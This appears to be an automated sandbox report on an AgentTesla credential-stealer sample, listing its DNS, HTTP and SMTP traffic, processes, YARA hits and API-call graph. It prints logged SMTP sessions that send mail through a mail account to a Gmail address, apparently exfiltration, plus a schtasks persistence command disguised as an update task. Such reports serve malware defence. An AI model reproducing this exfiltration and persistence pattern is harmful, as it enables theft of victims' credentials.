                                                  Nov 29, 2022 19:38:17.044811010 CET58749723111.118.212.38192.168.2.6
                                                  Nov 29, 2022 19:38:17.049279928 CET49723587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 19:38:17.323196888 CET58749723111.118.212.38192.168.2.6
                                                  Nov 29, 2022 19:38:17.323652983 CET49723587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 19:38:17.597578049 CET58749723111.118.212.38192.168.2.6
                                                  Nov 29, 2022 19:38:17.598759890 CET49723587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 19:38:17.912106991 CET58749723111.118.212.38192.168.2.6
                                                  Nov 29, 2022 19:38:18.662144899 CET58749723111.118.212.38192.168.2.6
                                                  Nov 29, 2022 19:38:18.662529945 CET49723587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 19:38:18.936058044 CET58749723111.118.212.38192.168.2.6
                                                  Nov 29, 2022 19:38:18.936109066 CET58749723111.118.212.38192.168.2.6
                                                  Nov 29, 2022 19:38:18.936378002 CET49723587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 19:38:19.257188082 CET58749723111.118.212.38192.168.2.6
                                                  Nov 29, 2022 19:38:19.277188063 CET58749723111.118.212.38192.168.2.6
                                                  Nov 29, 2022 19:38:19.277587891 CET49723587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 19:38:19.559030056 CET58749723111.118.212.38192.168.2.6
                                                  Nov 29, 2022 19:38:19.559258938 CET58749723111.118.212.38192.168.2.6
                                                  Nov 29, 2022 19:38:19.561263084 CET49723587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 19:38:19.561371088 CET49723587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 19:38:19.561435938 CET49723587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 19:38:19.561502934 CET49723587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 19:38:19.834079981 CET58749723111.118.212.38192.168.2.6
                                                  Nov 29, 2022 19:38:19.835743904 CET58749723111.118.212.38192.168.2.6
                                                  Nov 29, 2022 19:38:19.887628078 CET49723587192.168.2.6111.118.212.38
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Nov 29, 2022 19:37:07.495767117 CET4944853192.168.2.68.8.8.8
                                                  Nov 29, 2022 19:37:07.512861967 CET53494488.8.8.8192.168.2.6
                                                  Nov 29, 2022 19:37:07.538335085 CET5908253192.168.2.68.8.8.8
                                                  Nov 29, 2022 19:37:07.555747032 CET53590828.8.8.8192.168.2.6
                                                  Nov 29, 2022 19:37:26.407497883 CET6322953192.168.2.68.8.8.8
                                                  Nov 29, 2022 19:37:26.803889990 CET53632298.8.8.8192.168.2.6
                                                  Nov 29, 2022 19:37:26.886347055 CET6253853192.168.2.68.8.8.8
                                                  Nov 29, 2022 19:37:27.278209925 CET53625388.8.8.8192.168.2.6
                                                  Nov 29, 2022 19:37:53.002229929 CET5153053192.168.2.68.8.8.8
                                                  Nov 29, 2022 19:37:53.021419048 CET53515308.8.8.8192.168.2.6
                                                  Nov 29, 2022 19:37:53.077909946 CET5612253192.168.2.68.8.8.8
                                                  Nov 29, 2022 19:37:53.096793890 CET53561228.8.8.8192.168.2.6
                                                  Nov 29, 2022 19:38:15.257229090 CET6160953192.168.2.68.8.8.8
                                                  Nov 29, 2022 19:38:15.647279024 CET53616098.8.8.8192.168.2.6
                                                  Nov 29, 2022 19:38:15.719681025 CET5248153192.168.2.68.8.8.8
                                                  Nov 29, 2022 19:38:15.738940954 CET53524818.8.8.8192.168.2.6
                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Nov 29, 2022 19:37:07.495767117 CET192.168.2.68.8.8.80xf41eStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                  Nov 29, 2022 19:37:07.538335085 CET192.168.2.68.8.8.80xd51fStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                  Nov 29, 2022 19:37:26.407497883 CET192.168.2.68.8.8.80x43b6Standard query (0)mail.strictfacilityservices.comA (IP address)IN (0x0001)false
                                                  Nov 29, 2022 19:37:26.886347055 CET192.168.2.68.8.8.80xe34cStandard query (0)mail.strictfacilityservices.comA (IP address)IN (0x0001)false
                                                  Nov 29, 2022 19:37:53.002229929 CET192.168.2.68.8.8.80x837bStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                  Nov 29, 2022 19:37:53.077909946 CET192.168.2.68.8.8.80xa76cStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                  Nov 29, 2022 19:38:15.257229090 CET192.168.2.68.8.8.80x3a2eStandard query (0)mail.strictfacilityservices.comA (IP address)IN (0x0001)false
                                                  Nov 29, 2022 19:38:15.719681025 CET192.168.2.68.8.8.80xc385Standard query (0)mail.strictfacilityservices.comA (IP address)IN (0x0001)false
                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Nov 29, 2022 19:37:07.512861967 CET8.8.8.8192.168.2.60xf41eNo error (0)api.ipify.orgapi.ipify.org.herokudns.comCNAME (Canonical name)IN (0x0001)false
                                                  Nov 29, 2022 19:37:07.512861967 CET8.8.8.8192.168.2.60xf41eNo error (0)api.ipify.org.herokudns.com3.220.57.224A (IP address)IN (0x0001)false
                                                  Nov 29, 2022 19:37:07.512861967 CET8.8.8.8192.168.2.60xf41eNo error (0)api.ipify.org.herokudns.com52.20.78.240A (IP address)IN (0x0001)false
                                                  Nov 29, 2022 19:37:07.512861967 CET8.8.8.8192.168.2.60xf41eNo error (0)api.ipify.org.herokudns.com3.232.242.170A (IP address)IN (0x0001)false
                                                  Nov 29, 2022 19:37:07.512861967 CET8.8.8.8192.168.2.60xf41eNo error (0)api.ipify.org.herokudns.com54.91.59.199A (IP address)IN (0x0001)false
                                                  Nov 29, 2022 19:37:07.555747032 CET8.8.8.8192.168.2.60xd51fNo error (0)api.ipify.orgapi.ipify.org.herokudns.comCNAME (Canonical name)IN (0x0001)false
                                                  Nov 29, 2022 19:37:07.555747032 CET8.8.8.8192.168.2.60xd51fNo error (0)api.ipify.org.herokudns.com3.232.242.170A (IP address)IN (0x0001)false
                                                  Nov 29, 2022 19:37:07.555747032 CET8.8.8.8192.168.2.60xd51fNo error (0)api.ipify.org.herokudns.com3.220.57.224A (IP address)IN (0x0001)false
                                                  Nov 29, 2022 19:37:07.555747032 CET8.8.8.8192.168.2.60xd51fNo error (0)api.ipify.org.herokudns.com52.20.78.240A (IP address)IN (0x0001)false
                                                  Nov 29, 2022 19:37:07.555747032 CET8.8.8.8192.168.2.60xd51fNo error (0)api.ipify.org.herokudns.com54.91.59.199A (IP address)IN (0x0001)false
                                                  Nov 29, 2022 19:37:26.803889990 CET8.8.8.8192.168.2.60x43b6No error (0)mail.strictfacilityservices.comstrictfacilityservices.comCNAME (Canonical name)IN (0x0001)false
                                                  Nov 29, 2022 19:37:26.803889990 CET8.8.8.8192.168.2.60x43b6No error (0)strictfacilityservices.com111.118.212.38A (IP address)IN (0x0001)false
                                                  Nov 29, 2022 19:37:27.278209925 CET8.8.8.8192.168.2.60xe34cNo error (0)mail.strictfacilityservices.comstrictfacilityservices.comCNAME (Canonical name)IN (0x0001)false
                                                  Nov 29, 2022 19:37:27.278209925 CET8.8.8.8192.168.2.60xe34cNo error (0)strictfacilityservices.com111.118.212.38A (IP address)IN (0x0001)false
                                                  Nov 29, 2022 19:37:53.021419048 CET8.8.8.8192.168.2.60x837bNo error (0)api.ipify.orgapi.ipify.org.herokudns.comCNAME (Canonical name)IN (0x0001)false
                                                  Nov 29, 2022 19:37:53.021419048 CET8.8.8.8192.168.2.60x837bNo error (0)api.ipify.org.herokudns.com3.232.242.170A (IP address)IN (0x0001)false
                                                  Nov 29, 2022 19:37:53.021419048 CET8.8.8.8192.168.2.60x837bNo error (0)api.ipify.org.herokudns.com54.91.59.199A (IP address)IN (0x0001)false
                                                  Nov 29, 2022 19:37:53.021419048 CET8.8.8.8192.168.2.60x837bNo error (0)api.ipify.org.herokudns.com52.20.78.240A (IP address)IN (0x0001)false
                                                  Nov 29, 2022 19:37:53.021419048 CET8.8.8.8192.168.2.60x837bNo error (0)api.ipify.org.herokudns.com3.220.57.224A (IP address)IN (0x0001)false
                                                  Nov 29, 2022 19:37:53.096793890 CET8.8.8.8192.168.2.60xa76cNo error (0)api.ipify.orgapi.ipify.org.herokudns.comCNAME (Canonical name)IN (0x0001)false
                                                  Nov 29, 2022 19:37:53.096793890 CET8.8.8.8192.168.2.60xa76cNo error (0)api.ipify.org.herokudns.com54.91.59.199A (IP address)IN (0x0001)false
                                                  Nov 29, 2022 19:37:53.096793890 CET8.8.8.8192.168.2.60xa76cNo error (0)api.ipify.org.herokudns.com52.20.78.240A (IP address)IN (0x0001)false
                                                  Nov 29, 2022 19:37:53.096793890 CET8.8.8.8192.168.2.60xa76cNo error (0)api.ipify.org.herokudns.com3.232.242.170A (IP address)IN (0x0001)false
                                                  Nov 29, 2022 19:37:53.096793890 CET8.8.8.8192.168.2.60xa76cNo error (0)api.ipify.org.herokudns.com3.220.57.224A (IP address)IN (0x0001)false
                                                  Nov 29, 2022 19:38:15.647279024 CET8.8.8.8192.168.2.60x3a2eNo error (0)mail.strictfacilityservices.comstrictfacilityservices.comCNAME (Canonical name)IN (0x0001)false
                                                  Nov 29, 2022 19:38:15.647279024 CET8.8.8.8192.168.2.60x3a2eNo error (0)strictfacilityservices.com111.118.212.38A (IP address)IN (0x0001)false
                                                  Nov 29, 2022 19:38:15.738940954 CET8.8.8.8192.168.2.60xc385No error (0)mail.strictfacilityservices.comstrictfacilityservices.comCNAME (Canonical name)IN (0x0001)false
                                                  Nov 29, 2022 19:38:15.738940954 CET8.8.8.8192.168.2.60xc385No error (0)strictfacilityservices.com111.118.212.38A (IP address)IN (0x0001)false
                                                  • api.ipify.org
                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  0192.168.2.6497133.220.57.224443C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe
                                                  TimestampkBytes transferredDirectionData
                                                  2022-11-29 18:37:09 UTC0OUTGET / HTTP/1.1
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                  Host: api.ipify.org
                                                  Connection: Keep-Alive
                                                  2022-11-29 18:37:09 UTC0INHTTP/1.1 200 OK
                                                  Server: Cowboy
                                                  Connection: close
                                                  Content-Type: text/plain
                                                  Vary: Origin
                                                  Date: Tue, 29 Nov 2022 18:37:09 GMT
                                                  Content-Length: 14
                                                  Via: 1.1 vegur
                                                  2022-11-29 18:37:09 UTC0INData Raw: 31 30 32 2e 31 32 39 2e 31 34 33 2e 34 39
                                                  Data Ascii: 102.129.143.49


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  1192.168.2.6497203.232.242.170443C:\Users\user\AppData\Roaming\IwUNvHNy.exe
                                                  TimestampkBytes transferredDirectionData
                                                  2022-11-29 18:37:54 UTC0OUTGET / HTTP/1.1
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                  Host: api.ipify.org
                                                  Connection: Keep-Alive
                                                  2022-11-29 18:37:54 UTC0INHTTP/1.1 200 OK
                                                  Server: Cowboy
                                                  Connection: close
                                                  Content-Type: text/plain
                                                  Vary: Origin
                                                  Date: Tue, 29 Nov 2022 18:37:54 GMT
                                                  Content-Length: 14
                                                  Via: 1.1 vegur
                                                  2022-11-29 18:37:54 UTC0INData Raw: 31 30 32 2e 31 32 39 2e 31 34 33 2e 34 39
                                                  Data Ascii: 102.129.143.49


                                                  TimestampSource PortDest PortSource IPDest IPCommands
                                                  Nov 29, 2022 19:37:29.863013029 CET58749718111.118.212.38192.168.2.6220-bh-in-36.webhostbox.net ESMTP Exim 4.95 #2 Tue, 29 Nov 2022 18:37:29 +0000
                                                  220-We do not authorize the use of this system to transport unsolicited,
                                                  220 and/or bulk e-mail.
                                                  Nov 29, 2022 19:37:29.869247913 CET49718587192.168.2.6111.118.212.38EHLO 927537
                                                  Nov 29, 2022 19:37:30.148148060 CET58749718111.118.212.38192.168.2.6250-bh-in-36.webhostbox.net Hello 927537 [102.129.143.49]
                                                  250-SIZE 52428800
                                                  250-8BITMIME
                                                  250-PIPELINING
                                                  250-PIPE_CONNECT
                                                  250-AUTH PLAIN LOGIN
                                                  250-STARTTLS
                                                  250 HELP
                                                  Nov 29, 2022 19:37:30.150072098 CET49718587192.168.2.6111.118.212.38AUTH login YWNjb3VudHNAc3RyaWN0ZmFjaWxpdHlzZXJ2aWNlcy5jb20=
                                                  Nov 29, 2022 19:37:30.429714918 CET58749718111.118.212.38192.168.2.6334 UGFzc3dvcmQ6
                                                  Nov 29, 2022 19:37:31.260838985 CET58749718111.118.212.38192.168.2.6235 Authentication succeeded
                                                  Nov 29, 2022 19:37:31.261821985 CET49718587192.168.2.6111.118.212.38MAIL FROM:<accounts@strictfacilityservices.com>
                                                  Nov 29, 2022 19:37:31.541328907 CET58749718111.118.212.38192.168.2.6250 OK
                                                  Nov 29, 2022 19:37:31.541712999 CET49718587192.168.2.6111.118.212.38RCPT TO:<guc850155@gmail.com>
                                                  Nov 29, 2022 19:37:31.893450022 CET58749718111.118.212.38192.168.2.6250 Accepted
                                                  Nov 29, 2022 19:37:31.893871069 CET49718587192.168.2.6111.118.212.38DATA
                                                  Nov 29, 2022 19:37:32.172235012 CET58749718111.118.212.38192.168.2.6354 Enter message, ending with "." on a line by itself
                                                  Nov 29, 2022 19:37:32.174438953 CET49718587192.168.2.6111.118.212.38.
                                                  Nov 29, 2022 19:37:32.454948902 CET58749718111.118.212.38192.168.2.6250 OK id=1p05U4-002GFu-0G
                                                  Nov 29, 2022 19:38:17.044811010 CET58749723111.118.212.38192.168.2.6220-bh-in-36.webhostbox.net ESMTP Exim 4.95 #2 Tue, 29 Nov 2022 18:38:16 +0000
                                                  220-We do not authorize the use of this system to transport unsolicited,
                                                  220 and/or bulk e-mail.
                                                  Nov 29, 2022 19:38:17.049279928 CET49723587192.168.2.6111.118.212.38EHLO 927537
                                                  Nov 29, 2022 19:38:17.323196888 CET58749723111.118.212.38192.168.2.6250-bh-in-36.webhostbox.net Hello 927537 [102.129.143.49]
                                                  250-SIZE 52428800
                                                  250-8BITMIME
                                                  250-PIPELINING
                                                  250-PIPE_CONNECT
                                                  250-AUTH PLAIN LOGIN
                                                  250-STARTTLS
                                                  250 HELP
                                                  Nov 29, 2022 19:38:17.323652983 CET49723587192.168.2.6111.118.212.38AUTH login YWNjb3VudHNAc3RyaWN0ZmFjaWxpdHlzZXJ2aWNlcy5jb20=
                                                  Nov 29, 2022 19:38:17.597578049 CET58749723111.118.212.38192.168.2.6334 UGFzc3dvcmQ6
                                                  Nov 29, 2022 19:38:18.662144899 CET58749723111.118.212.38192.168.2.6235 Authentication succeeded
                                                  Nov 29, 2022 19:38:18.662529945 CET49723587192.168.2.6111.118.212.38MAIL FROM:<accounts@strictfacilityservices.com>
                                                  Nov 29, 2022 19:38:18.936109066 CET58749723111.118.212.38192.168.2.6250 OK
                                                  Nov 29, 2022 19:38:18.936378002 CET49723587192.168.2.6111.118.212.38RCPT TO:<guc850155@gmail.com>
                                                  Nov 29, 2022 19:38:19.277188063 CET58749723111.118.212.38192.168.2.6250 Accepted
                                                  Nov 29, 2022 19:38:19.277587891 CET49723587192.168.2.6111.118.212.38DATA
                                                  Nov 29, 2022 19:38:19.559258938 CET58749723111.118.212.38192.168.2.6354 Enter message, ending with "." on a line by itself
                                                  Nov 29, 2022 19:38:19.561502934 CET49723587192.168.2.6111.118.212.38.
                                                  Nov 29, 2022 19:38:19.835743904 CET58749723111.118.212.38192.168.2.6250 OK id=1p05Up-002Gde-Cs

                                                  Click to jump to process

                                                  Click to jump to process

                                                  Click to dive into process behavior distribution

                                                  Click to jump to process

                                                  Target ID:0
                                                  Start time:19:36:26
                                                  Start date:29/11/2022
                                                  Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe
                                                  Imagebase:0xcf0000
                                                  File size:731648 bytes
                                                  MD5 hash:65CF34490748F7924DB84DC043F5D81E
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.316510086.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.316510086.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000000.00000002.316510086.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                  Reputation:low

                                                  Target ID:8
                                                  Start time:19:36:52
                                                  Start date:29/11/2022
                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IwUNvHNy" /XML "C:\Users\user\AppData\Local\Temp\tmp2885.tmp
                                                  Imagebase:0x960000
                                                  File size:185856 bytes
                                                  MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Target ID:9
                                                  Start time:19:36:52
                                                  Start date:29/11/2022
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6da640000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Target ID:10
                                                  Start time:19:36:53
                                                  Start date:29/11/2022
                                                  Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:{path}
                                                  Imagebase:0x780000
                                                  File size:731648 bytes
                                                  MD5 hash:65CF34490748F7924DB84DC043F5D81E
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.524293663.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000000.305776965.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000A.00000000.305776965.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 0000000A.00000000.305776965.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.525329197.0000000002B54000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low

                                                  Target ID:11
                                                  Start time:19:36:53
                                                  Start date:29/11/2022
                                                  Path:C:\Users\user\AppData\Roaming\IwUNvHNy.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\AppData\Roaming\IwUNvHNy.exe
                                                  Imagebase:0x3a0000
                                                  File size:731648 bytes
                                                  MD5 hash:65CF34490748F7924DB84DC043F5D81E
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:.Net C# or VB.NET
                                                  Antivirus matches:
                                                  • Detection: 100%, Joe Sandbox ML
                                                  Reputation:low

                                                  Target ID:12
                                                  Start time:19:37:38
                                                  Start date:29/11/2022
                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IwUNvHNy" /XML "C:\Users\user\AppData\Local\Temp\tmpD8CA.tmp
                                                  Imagebase:0x960000
                                                  File size:185856 bytes
                                                  MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Target ID:13
                                                  Start time:19:37:38
                                                  Start date:29/11/2022
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6da640000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Target ID:14
                                                  Start time:19:37:39
                                                  Start date:29/11/2022
                                                  Path:C:\Users\user\AppData\Roaming\IwUNvHNy.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:{path}
                                                  Imagebase:0xcf0000
                                                  File size:731648 bytes
                                                  MD5 hash:65CF34490748F7924DB84DC043F5D81E
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.525739728.0000000003164000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.524696684.0000000003111000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:13.7%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:184
                                                    Total number of Limit Nodes:7
                                                    execution_graph 22501 7649a20 22502 7649a48 22501->22502 22505 7649a2d 22501->22505 22502->22505 22506 76453d4 22502->22506 22504 7649a59 22507 76453df 22506->22507 22510 7645414 22507->22510 22509 7649d75 22509->22504 22511 764541f 22510->22511 22512 7649f0b 22511->22512 22513 7649ee1 GetCurrentThreadId 22511->22513 22512->22509 22513->22512 22516 7649770 22518 764979e 22516->22518 22517 7649829 22517->22517 22518->22517 22520 7645398 22518->22520 22522 76453a3 22520->22522 22521 7649950 22521->22517 22522->22521 22526 76453b8 22522->22526 22528 76453c3 22526->22528 22527 7649917 22527->22521 22531 76453c8 22527->22531 22528->22527 22534 177eff0 22528->22534 22538 177f000 22528->22538 22532 7649aa0 SetTimer 22531->22532 22533 7649b0c 22532->22533 22533->22521 22535 177f000 22534->22535 22536 177f0d1 22535->22536 22542 177fd40 22535->22542 22539 177f02a 22538->22539 22540 177f0d1 22539->22540 22541 177fd40 CreateWindowExW 22539->22541 22541->22540 22543 177fda6 22542->22543 22544 177fe03 CreateWindowExW 22542->22544 22543->22536 22546 177ff1c 22544->22546 22546->22546 22547 7649b40 22550 7649b6d 22547->22550 22548 7649bbc 22548->22548 22550->22548 22551 76453f4 22550->22551 22552 76453ff 22551->22552 22553 76453d4 GetCurrentThreadId 22552->22553 22554 7649d1c 22553->22554 22555 7645398 2 API calls 22554->22555 22556 7649d25 22555->22556 22556->22548 22557 177b8d0 GetCurrentProcess 22558 177b943 22557->22558 22559 177b94a GetCurrentThread 22557->22559 22558->22559 22560 177b987 GetCurrentProcess 22559->22560 22561 177b980 22559->22561 22562 177b9bd 22560->22562 22561->22560 22563 177b9e5 GetCurrentThreadId 22562->22563 22564 177ba16 22563->22564 22565 7641d48 22566 7641d56 22565->22566 22567 7641dde 22566->22567 22571 7641d67 22566->22571 22578 7641e98 22567->22578 22582 7641e89 22567->22582 22568 7641de5 22586 76411fc 22568->22586 22572 76411fc 4 API calls 22571->22572 22573 7641d9e 22572->22573 22574 76411fc 4 API calls 22573->22574 22575 7641dcc 22574->22575 22579 7641ea8 22578->22579 22580 7641ec0 22578->22580 22590 7641264 22579->22590 22580->22568 22583 7641ea8 22582->22583 22584 7641ec0 22582->22584 22585 7641264 4 API calls 22583->22585 22584->22568 22585->22584 22588 7641207 22586->22588 22587 7641df7 22588->22587 22589 7641264 4 API calls 22588->22589 22589->22587 22591 764126f 22590->22591 22596 764149c 22591->22596 22600 7641f38 22591->22600 22604 7641f28 22591->22604 22592 7641f11 22592->22580 22597 76414a7 22596->22597 22608 76414cc 22597->22608 22599 7641fa5 22599->22592 22601 7641f49 22600->22601 22602 764149c 4 API calls 22601->22602 22603 7641f52 22602->22603 22603->22592 22605 7641f38 22604->22605 22606 764149c 4 API calls 22605->22606 22607 7641f52 22606->22607 22607->22592 22609 76414d7 22608->22609 22613 1776820 22609->22613 22621 1777130 22609->22621 22610 7641fd3 22610->22599 22614 177682b 22613->22614 22616 17773de 22614->22616 22629 7642180 22614->22629 22633 17793bf 22614->22633 22637 17793d0 22614->22637 22615 177741c 22615->22610 22616->22615 22641 177b4f7 22616->22641 22622 1777135 22621->22622 22624 17773de 22622->22624 22625 7642180 3 API calls 22622->22625 22626 17793d0 3 API calls 22622->22626 22627 17793bf 3 API calls 22622->22627 22623 177741c 22623->22610 22624->22623 22628 177b4f7 4 API calls 22624->22628 22625->22624 22626->22624 22627->22624 22628->22623 22646 17798d0 22629->22646 22654 177989a 22629->22654 22630 764218e 22630->22616 22634 17793df 22633->22634 22635 17798d0 2 API calls 22633->22635 22636 177989a 2 API calls 22633->22636 22634->22616 22635->22634 22636->22634 22639 17798d0 2 API calls 22637->22639 22640 177989a 2 API calls 22637->22640 22638 17793df 22638->22616 22639->22638 22640->22638 22642 177b521 22641->22642 22643 177b545 22642->22643 22674 177b7b8 22642->22674 22678 177b7a8 22642->22678 22643->22615 22647 17798e3 22646->22647 22648 17798fb 22647->22648 22662 1779b58 22647->22662 22666 1779b48 22647->22666 22648->22630 22649 17798f3 22649->22648 22650 1779af8 GetModuleHandleW 22649->22650 22651 1779b25 22650->22651 22651->22630 22655 17798ad 22654->22655 22656 17798fb 22655->22656 22660 1779b58 LoadLibraryExW 22655->22660 22661 1779b48 LoadLibraryExW 22655->22661 22656->22630 22657 17798f3 22657->22656 22658 1779af8 GetModuleHandleW 22657->22658 22659 1779b25 22658->22659 22659->22630 22660->22657 22661->22657 22663 1779b6c 22662->22663 22664 1779b91 22663->22664 22670 177950c 22663->22670 22664->22649 22667 1779b58 22666->22667 22668 1779b91 22667->22668 22669 177950c LoadLibraryExW 22667->22669 22668->22649 22669->22668 22671 1779d38 LoadLibraryExW 22670->22671 22673 1779db1 22671->22673 22673->22664 22676 177b7c5 22674->22676 22675 177b7ff 22675->22643 22676->22675 22682 1779810 22676->22682 22679 177b7b8 22678->22679 22680 177b7ff 22679->22680 22681 1779810 4 API calls 22679->22681 22680->22643 22681->22680 22683 177981b 22682->22683 22685 177c4f8 22683->22685 22686 177bee4 22683->22686 22685->22685 22687 177beef 22686->22687 22688 1776820 4 API calls 22687->22688 22689 177c567 22687->22689 22688->22689 22693 177e2f0 22689->22693 22702 177e2d8 22689->22702 22690 177c5a0 22690->22685 22695 177e413 22693->22695 22696 177e321 22693->22696 22694 177e32d 22694->22690 22695->22690 22696->22694 22700 177e629 LoadLibraryExW GetModuleHandleW 22696->22700 22701 177e638 LoadLibraryExW GetModuleHandleW 22696->22701 22697 177e36e 22698 177eff0 CreateWindowExW 22697->22698 22699 177f000 CreateWindowExW 22697->22699 22698->22695 22699->22695 22700->22697 22701->22697 22704 177e2e2 22702->22704 22703 177e32d 22703->22690 22704->22703 22708 177e629 LoadLibraryExW GetModuleHandleW 22704->22708 22709 177e638 LoadLibraryExW GetModuleHandleW 22704->22709 22705 177e36e 22706 177eff0 CreateWindowExW 22705->22706 22707 177f000 CreateWindowExW 22705->22707 22706->22703 22707->22703 22708->22705 22709->22705 22514 177baf8 DuplicateHandle 22515 177bb8e 22514->22515 22710 1776608 22711 177661f 22710->22711 22714 17756ec 22711->22714 22713 177662c 22715 17756f7 22714->22715 22718 177571c 22715->22718 22717 17766fd 22717->22713 22719 1775727 22718->22719 22722 177574c 22719->22722 22721 17767da 22721->22717 22723 1775757 22722->22723 22724 1776820 4 API calls 22723->22724 22725 1776cd2 22724->22725 22725->22721

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 383 177b8c1-177b941 GetCurrentProcess 384 177b943-177b949 383->384 385 177b94a-177b97e GetCurrentThread 383->385 384->385 386 177b987-177b9bb GetCurrentProcess 385->386 387 177b980-177b986 385->387 388 177b9c4-177b9dc 386->388 389 177b9bd-177b9c3 386->389 387->386 401 177b9df call 177ba80 388->401 402 177b9df call 177be70 388->402 403 177b9df call 177be60 388->403 389->388 393 177b9e5-177ba14 GetCurrentThreadId 394 177ba16-177ba1c 393->394 395 177ba1d-177ba7f 393->395 394->395 401->393 402->393 403->393
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 0177B930
                                                    • GetCurrentThread.KERNEL32 ref: 0177B96D
                                                    • GetCurrentProcess.KERNEL32 ref: 0177B9AA
                                                    • GetCurrentThreadId.KERNEL32 ref: 0177BA03
                                                    Strings
                                                    Memory Dump Source
